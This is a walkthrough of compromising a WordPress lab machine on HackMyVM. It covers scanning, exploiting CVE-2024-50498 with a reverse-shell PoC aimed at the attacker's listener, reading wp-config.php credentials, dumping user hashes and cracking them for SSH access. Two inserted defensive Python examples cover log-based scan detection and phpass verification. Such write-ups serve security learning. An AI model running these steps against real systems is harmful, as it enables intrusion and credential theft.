HackMyVM buster machine detailed walkthrough (WP)
城南花已开 Lv5

Information gathering

Service probing

❯ arp-scan -l
pcap_activate: eth0: You don't have permission to perform this capture on that device
(socket: Operation not permitted)
❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.146 08:00:27:2c:76:ab (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.969 seconds (130.02 hosts/sec). 4 responded
❯ export ip=192.168.60.146
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.146:22
Open 192.168.60.146:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 16:00 CST
Initiating ARP Ping Scan at 16:00
Scanning 192.168.60.146 [1 port]
Completed ARP Ping Scan at 16:00, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:00
Completed Parallel DNS resolution of 1 host. at 16:00, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:00
Scanning 192.168.60.146 [2 ports]
Discovered open port 80/tcp on 192.168.60.146
Discovered open port 22/tcp on 192.168.60.146
Completed SYN Stealth Scan at 16:00, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.146
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-09 16:00:24 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:2C:76:AB (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 serves WordPress, so let's try scanning it with wpscan.

❯ wpscan --url http://$ip -e u,ap --api-token "换成自己的Api"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.146/ [192.168.60.146]
[+] Started: Thu Jan 9 16:00:44 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://192.168.60.146/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.146/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.146/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.146/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.60.146/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.60.146/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: the-canvas
| Location: http://192.168.60.146/wp-content/themes/the-canvas/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2023-11-06T00:00:00.000Z
| Readme: http://192.168.60.146/wp-content/themes/the-canvas/readme.txt
| Style URL: http://192.168.60.146/wp-content/themes/the-canvas/style.css
| Style Name: The Canvas
| Description: Introducing The Canvas —a testament to simplicity and elegance. It has meticulously crafted a clean ...
| Author: Rajuan
| Author URI: https://profiles.wordpress.org/rajuanislam/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.60.146/wp-content/themes/the-canvas/style.css, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.60.146/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://192.168.60.146/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23

[+] Finished: Thu Jan 9 16:00:49 2025
[+] Requests Done: 56
[+] Cached Requests: 8
[+] Data Sent: 14.268 KB
[+] Data Received: 425.201 KB
[+] Memory used: 271.984 MB
[+] Elapsed time: 00:00:05

The scan doesn't turn up much relevant information, only two users.

We can try wpscan's aggressive scanning mode.

WPScan aggressive scan

This mode enumerates every plugin, so it is quite slow; you just have to wait.

Put simply, it has a dictionary of WordPress plugin names and checks each one in turn.

The results came out after about twenty minutes.

❯ wpscan --url http://$ip -e u,ap --plugins-detection aggressive --api-token "换成自己的Api"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.146/ [192.168.60.146]
[+] Started: Thu Jan 9 16:01:35 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://192.168.60.146/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.146/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.146/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.146/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.60.146/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.60.146/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: the-canvas
| Location: http://192.168.60.146/wp-content/themes/the-canvas/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2023-11-06T00:00:00.000Z
| Readme: http://192.168.60.146/wp-content/themes/the-canvas/readme.txt
| Style URL: http://192.168.60.146/wp-content/themes/the-canvas/style.css
| Style Name: The Canvas
| Description: Introducing The Canvas —a testament to simplicity and elegance. It has meticulously crafted a clean ...
| Author: Rajuan
| Author URI: https://profiles.wordpress.org/rajuanislam/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.60.146/wp-content/themes/the-canvas/style.css, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:22:32 <================================================================> (108461 / 108461) 100.00% Time: 00:22:32
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.60.146/wp-content/plugins/akismet/
| Latest Version: 5.3.5 (up to date)
| Last Updated: 2024-11-19T02:02:00.000Z
| Readme: http://192.168.60.146/wp-content/plugins/akismet/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/akismet/readme.txt

[+] feed
| Location: http://192.168.60.146/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.

[+] wp-query-console
| Location: http://192.168.60.146/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.60.146/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/wp-query-console/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
| References:
| - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.146/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.60.146/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://192.168.60.146/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 20

[+] Finished: Thu Jan 9 16:24:18 2025
[+] Requests Done: 108507
[+] Cached Requests: 48
[+] Data Sent: 29.031 MB
[+] Data Received: 34.545 MB
[+] Memory used: 465.609 MB
[+] Elapsed time: 00:22:43

  • vp: enumerate vulnerable plugins
  • ap: enumerate all plugins
  • p: enumerate popular plugins
  • vt: enumerate vulnerable themes
  • at: enumerate all themes
  • t: enumerate popular themes
  • tt: enumerate TimThumb (thumbnail) scripts
  • cb: enumerate config backups
  • dbe: enumerate database exports
  • u: enumerate user IDs, e.g. u1-5
  • m: enumerate media IDs, e.g. m1-5
  • --plugins-detection: detection mode
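Both scans above leave a very recognisable trail in the web server log: the REST users route, the author sitemap, `?author=N` probing, and (for the aggressive run) a hundred thousand requests for bare `/wp-content/plugins/<slug>/` directories. The following is an added example, not part of this walkthrough, that parses nginx combined-format access-log lines and flags those two behaviours per source IP; the sample log lines are constructed, the `probe-NNN` slugs are made up, and the 20-directory threshold is an assumption.

```python
import re
from collections import defaultdict

# nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Endpoints WPScan used above to list users: REST users route, author sitemap, ?author=N.
USER_ENUM_RE = re.compile(r'^/(wp-json/wp/v2/users|wp-sitemap-users-\d+\.xml|\?author=\d+)')
# A bare request for a plugin directory root, which real browsers almost never make.
PLUGIN_DIR_RE = re.compile(r'^/wp-content/plugins/([^/?]+)/?$')
PLUGIN_PROBE_THRESHOLD = 20  # assumed cut-off: distinct plugin dirs requested per source IP


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def analyze(log_text):
    """Aggregate per source IP and raise flags for the two WPScan behaviours."""
    per_ip = defaultdict(lambda: {'user_enum': [], 'plugin_dir_probes': set(), 'flags': set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        info = per_ip[rec['ip']]
        if USER_ENUM_RE.match(rec['path']):
            info['user_enum'].append(rec['path'])
        pm = PLUGIN_DIR_RE.match(rec['path'])
        if pm:
            info['plugin_dir_probes'].add(pm.group(1))
    for info in per_ip.values():
        if info['user_enum']:
            info['flags'].add('user-enumeration')
        if len(info['plugin_dir_probes']) >= PLUGIN_PROBE_THRESHOLD:
            info['flags'].add('plugin-bruteforce')
    return dict(per_ip)


def _line(ip, ts, path, status):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 153 "-" "Mozilla/5.0"'


# Constructed sample log: the scanner host from the walkthrough enumerating users and
# then hammering plugin directories (slugs probe-000.. are made up), plus a benign visitor.
_SCAN_TS = '09/Jan/2025:16:01:36 +0800'
SAMPLE_LOG = '\n'.join(
    [_line('192.168.60.100', '09/Jan/2025:16:00:44 +0800', '/wp-json/wp/v2/users/?per_page=100&page=1', 200),
     _line('192.168.60.100', '09/Jan/2025:16:00:45 +0800', '/wp-sitemap-users-1.xml', 200),
     _line('192.168.60.100', '09/Jan/2025:16:00:45 +0800', '/?author=1', 301),
     _line('192.168.60.100', '09/Jan/2025:16:00:45 +0800', '/?author=2', 301),
     _line('192.168.60.100', _SCAN_TS, '/wp-content/plugins/akismet/', 200),
     _line('192.168.60.100', _SCAN_TS, '/wp-content/plugins/wp-query-console/', 403)]
    + [_line('192.168.60.100', _SCAN_TS, f'/wp-content/plugins/probe-{i:03d}/', 404) for i in range(30)]
    + [_line('192.168.60.200', '09/Jan/2025:16:05:00 +0800', '/wp-content/plugins/akismet/', 200),
       _line('192.168.60.200', '09/Jan/2025:16:05:01 +0800', '/2025/01/08/hello-world/', 200)]
)

if __name__ == '__main__':
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, sorted(info['flags']), len(info['plugin_dir_probes']), 'plugin dirs probed')
```

The detection keys on request shape rather than the User-Agent, since the latter is trivially changed.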

PoC exploitation

In the results we can see that one plugin has an RCE vulnerability.

Google CVE-2024-50498.

There are public PoCs:

Nxploited/CVE-2024-50498

RandomRobbieBF/CVE-2024-50498: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution

But you'll find that the first PoC script can't be used directly.

Look at the script's exploitation approach and reproduce it by hand to see whether we can get the output we want.

Requesting the phpinfo output works.


We can see that the first PoC uses PHP's system() to execute commands.


But why does it error out with a 400?

❯ python3 CVE-2024-50498.py -u http://192.168.60.146 -ip 192.168.60.100 -P 4444
[+] The site is vulnerable! Plugin version is 1.0.
[-] Exploit failed. Status code: 400
Response:
{"status":"error","data":"null","message":"Query args invalid"}

Looking closely at the phpinfo output, many functions are disabled, and system is among them.


I don't know PHP that well, so I just asked GPT.


Try whether shell_exec() can be used to get a reverse shell.

First listen on a port locally.

❯ pwncat-cs -lp 4444
[17:10:18] Welcome to pwncat 🐈! __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

The POST request hangs when sent, which means the command executed.


User privilege escalation

With a web shell obtained, gather information again.

❯ pwncat-cs -lp 4444
[17:10:18] Welcome to pwncat 🐈! __main__.py:164
[17:10:40] received connection from 192.168.60.146:52658 bind.py:84
[17:10:41] 192.168.60.146:52658: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@listen:/var/www/html/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Look at wp-config.php; it contains sensitive information.

(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '2Ryf <:T/-4,9h?q%jDi(HKG_*1xH-nU+-//7[1H}zD@=q0ls8junY(~.MG@D[$S' );
define( 'SECURE_AUTH_KEY', '}z]MVJ|P5~X1!+76?dT?s|@A,92D4/+phWkWb=;I+k{_y)7,A,<=5|&z<tE:`HET' );
define( 'LOGGED_IN_KEY', 'p4w9>FcR>{+u:M,M4rT}VIW.[Pg=UZjzp8n{-/&F;j!nC49f-^~$unsry+lHW w!' );
define( 'NONCE_KEY', ';qi?~eGux58*l4NoDh@?<`^B6!HK{G:C85Hv8sC6<t,y}8veV4pvs#{ [[T?s123' );
define( 'AUTH_SALT', 'l2^yBli3l_G#J<T 2p}e#bS>j_=,!06$%qYd#I<p22c:z&`s?ic;7UxS$T6c{HXr' );
define( 'SECURE_AUTH_SALT', '<;95CFam*#)^qbL)a,KZXrqS$!]Ln^2yF2wg#Fa?9F<D)-,irw&nj/$pB)BR1u|O' );
define( 'LOGGED_IN_SALT', 'JaR6i0q<wZMJD-7HwE:7ZwtNxV$BJ%15=8~Bw(_jCL_`+<`^asIdv=$Yo81jE19K' );
define( 'NONCE_SALT', 'q!5K2-Q*^%Tf<lz)*o0&8/CCjU;8-jdLS4,*5vk/8,^j&]<S7+I&eO55C_CM6N@L' );

/**#@-*/

/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if ( file_exists(ABSPATH . 'update-url.php') ) {
include_once(ABSPATH . 'update-url.php');
}

There is a database account in it.

Port 3306 is also listening locally, so connect with mysql and take a look.

(remote) www-data@listen:/var/www/html/wordpress$ ss -lnutp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=407,fd=6))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:* users:(("nginx",pid=407,fd=7))
tcp LISTEN 0 128 [::]:22 [::]:*
(remote) www-data@listen:/var/www/html/wordpress$ mysql -ull104567 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 108612
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.002 sec)
MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | ta0 | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0 | [email protected] | http://192.168.31.181 | 2025-01-08 03:10:43 | | 0 | ta0 |
| 2 | welcome | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome | [email protected] | | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. | 0 | welcome |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.002 sec)

MariaDB [wordpress]>

Password cracking

There are password hashes for two accounts; export them and try cracking.

MariaDB [wordpress]> select user_pass from wp_users;
+------------------------------------+
| user_pass |
+------------------------------------+
| $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. |
| $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ |
+------------------------------------+
2 rows in set (0.001 sec)

MariaDB [wordpress]> EXIT
Bye

The $P$ prefix marks a hash generated by WordPress; you can find an example in the hashcat wiki.


echo -n '$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/' >hash
❯ hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt
$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/:104567

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/
Time.Started.....: Thu Jan 9 17:30:39 2025 (2 mins, 24 secs)
Time.Estimated...: Thu Jan 9 17:33:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5116 H/s (6.04ms) @ Accel:128 Loops:512 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 740352/14344385 (5.16%)
Rejected.........: 0/740352 (0.00%)
Restore.Point....: 739840/14344385 (5.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7680-8192
Candidate.Engine.: Device Generator
Candidates.#1....: 106302 -> 10082002

Started: Thu Jan 9 17:30:17 2025
Stopped: Thu Jan 9 17:33:05 2025

Got the password: 104567

Of course you can also just throw john at it without caring about the hash type; it's personal preference.

❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
104567 (?)
1g 0:00:00:11 DONE (2025-01-09 17:36) 0.08992g/s 66543p/s 66543c/s 66543C/s 11042550..103645
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
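To see why rockyou cracked this hash in a couple of minutes, it helps to reimplement the $P$ (phpass) scheme that both hashcat mode 400 and john's phpass format target: an MD5 of salt+password followed by 2^N more MD5 rounds, where N is encoded by the character after "$P$" ('B' gives 8192, the cost john printed above). This is an added example, not code from the walkthrough; it recomputes the "welcome" user's hash from the page with the cracked password and exposes the iteration count so stored hashes can be audited.

```python
import hashlib
import hmac

# phpass alphabet; the character after "$P$" indexes into it to give log2(iterations).
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (little-endian 6-bit groups, no padding)."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
        if i >= count:
            break
    return ''.join(out)


def phpass_hash(password: str, salt: str, count_log2: int) -> str:
    """Portable phpass hash: md5(salt+pw), then 2**count_log2 rounds of md5(prev+pw)."""
    if not (7 <= count_log2 <= 30) or len(salt) != 8:
        raise ValueError('invalid phpass parameters')
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return '$P$' + ITOA64[count_log2] + salt + _encode64(digest, 16)


def phpass_cost(stored: str) -> int:
    """Iteration count encoded in a stored $P$/$H$ hash (john reported 8192 above)."""
    return 1 << ITOA64.index(stored[3])


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored phpass hash."""
    if len(stored) != 34 or stored[:3] not in ('$P$', '$H$') or stored[3] not in ITOA64:
        return False
    try:
        computed = phpass_hash(password, stored[4:12], ITOA64.index(stored[3]))
    except ValueError:
        return False
    return hmac.compare_digest(computed[3:].encode(), stored[3:].encode())


if __name__ == '__main__':
    # Hash of the "welcome" user as dumped from wp_users in the walkthrough.
    stored = '$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/'
    print('iterations:', phpass_cost(stored))
    print('104567 matches:', phpass_verify('104567', stored))
    print('wrong password matches:', phpass_verify('password', stored))
```

8192 MD5 rounds is cheap enough for a wordlist attack at thousands of hashes per second on a single CPU, as the hashcat speed line above shows; a short numeric password on top of that is what made it fall.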

Use this account to log in via SSH.

❯ ssh [email protected]
The authenticity of host '192.168.60.146 (192.168.60.146)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
